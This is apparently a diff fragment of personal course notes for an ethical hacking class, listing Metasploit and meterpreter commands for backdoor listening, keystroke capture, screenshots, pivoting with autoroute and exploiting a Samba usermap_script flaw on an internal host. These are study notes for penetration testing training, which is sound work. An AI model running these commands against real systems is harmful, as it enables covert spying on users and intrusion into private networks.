robindhondt95/Penetration-Testing/Ethical Hacking From Scratch Udemy/Commands And Tools.md

 use exploit/multi/handler to listen to the port specified in the backdoor you uploaded.
 ##### YOU ALWAYS WILL GET A CONNECTION!!!!

+### Spying: Capturing Keys Strikes & Taking screen shots

+#### Capturing Key Strikes

+After having an active meterpreter session

+List active sessions:
+`> sessions -l`

+Connect to an active session:
+`> sessions -i 2`

+Start the KeyScan program:
+`meterpreter > keyscan_start`

+To see all keystrokes that are reccorded:
+`meterpreter > keyscan_dump`

+To stop this program:
+`meterpreter > keyscan_stop`

+#### Get Screenshots

+Simply enter the command:
+`meterpreter > screenshot`

+Image goes to the root directory.

+## Pivoting

+Here is shown how to use the hacked device as a pivot to gain access to other devices on the network.

+Connect to an active session:
+`> sessions -i 2`

+Check all ipsettings and interfaces:
+Find a interface/subnet that is not visible to the hackers device where the target is connected to `meterpreter > ifconfig`

+Use an exploit to create a route between the hacker and the internal network found by ifconfig:
+`meterpreter > run autoroute -s 10.2.2.1/24`

+Background current session:
+`meterpreter > background`

+Use an exploit to hack the new device through the new route, the device will now be visible for the hackers device `msf > use exploit/multi/samba/usermap_script` `msf(usermap_script) > show options` `msf(usermap_script) > set RHOST 10.20.15.4` (target computer) `msf(usermap_script) > show payloads` `msf(usermap_script) > set PAYLOAD cmd/unix/bind_netstat` `msf(usermap_script) > exploit`

+# Website Penetration testing